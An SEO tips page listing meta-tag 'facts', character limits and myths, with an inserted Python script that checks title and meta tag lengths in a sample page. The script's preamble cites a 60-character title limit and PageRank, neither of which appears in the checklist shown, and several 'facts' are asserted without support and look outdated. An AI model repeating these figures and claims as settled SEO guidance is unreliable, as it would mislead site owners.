  • Fact: All major search engines including Google, Yahoo!, Scrub The Web, MSN Bing and others utilize Meta Tags! Don’t take our word for it.
  • A Meta Description Tag that contains too many characters is not what we consider a “robot friendly” Web page. The maximum number of characters we recommend for this Tag is 150.
  • Fact: Having search engine friendly Title and Meta Tags is the most basic step toward search engine optimization (SEO).
  • For the Meta Keywords Tag, our recommended maximum number of characters is 874, although we would never recommend you use this entire allowance because you may then suffer from keyword saturation.
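The checklist above gives three concrete limits (60 characters for the Title Tag, 150 for the Meta Description Tag, 874 for the Meta Keywords Tag). The following script is an added example, not code from the original article: it parses a page's head with Python's standard-library html.parser, measures those three tags and reports which limits are exceeded. The sample HTML at the bottom is constructed for the demonstration; PageRank is not checked because it cannot be measured offline.

```python
from html.parser import HTMLParser

# Recommended maxima from the checklist above.
TITLE_MAX = 60
DESCRIPTION_MAX = 150
KEYWORDS_MAX = 874


class _HeadTagParser(HTMLParser):
    """Collects the <title> text and the description/keywords meta tags."""

    def __init__(self):
        super().__init__()
        self.title_parts = []
        self.description = None   # None means the tag was not present
        self.keywords = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names; values may be None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "meta":
            name = a.get("name", "").lower()
            if name == "description":
                self.description = a.get("content", "")
            elif name == "keywords":
                self.keywords = a.get("content", "")

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title_parts.append(data)


def analyze_head(html):
    """Return (lengths, findings): measured tag lengths and a list of problems."""
    p = _HeadTagParser()
    p.feed(html)
    p.close()
    # Collapse whitespace the way a search engine would display the title.
    title = " ".join("".join(p.title_parts).split())
    lengths = {
        "title": len(title),
        "description": None if p.description is None else len(p.description),
        "keywords": None if p.keywords is None else len(p.keywords),
    }
    findings = []
    if not title:
        findings.append("title tag missing or empty")
    elif lengths["title"] > TITLE_MAX:
        findings.append(f"title is {lengths['title']} characters (max {TITLE_MAX})")
    if p.description is None:
        findings.append("meta description missing")
    elif lengths["description"] > DESCRIPTION_MAX:
        findings.append(
            f"meta description is {lengths['description']} characters (max {DESCRIPTION_MAX})")
    # Keywords are optional; only flag them when present and too long.
    if p.keywords is not None and lengths["keywords"] > KEYWORDS_MAX:
        findings.append(f"meta keywords is {lengths['keywords']} characters (max {KEYWORDS_MAX})")
    return lengths, findings


# Constructed sample page: the title is over the limit, the description is fine.
SAMPLE_HTML = """<html><head>
<title>  Hackers Chronicle: Linux, Kernel Exploits, WhatsApp Flaws and SEO Tips for Beginners </title>
<meta name="description" content="Security news and tutorials.">
<meta NAME="keywords" content="linux, security, seo">
</head><body></body></html>"""

if __name__ == "__main__":
    lengths, findings = analyze_head(SAMPLE_HTML)
    print(lengths)
    for finding in findings:
        print("-", finding)
```

To check a live page, read its HTML from disk or a fetched response and pass the string to analyze_head; the function never performs network access itself.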
Myth: “Nobody needs search engine optimization.”

Truth: More than 80% of Internet users use search engines to find what they are looking for. Therefore any Website wanting new visitors needs search engine optimization.

Myth: “Submitting to search engines means everyone on the Internet will find you.”

Truth: People are not going to find you in search engines just because you submitted to them. If you truly want to capture your fair share and more of search engine traffic, you must optimize your Web pages. SEO plays an important role in your ability to succeed on the Internet.

Reference: hackerschronicle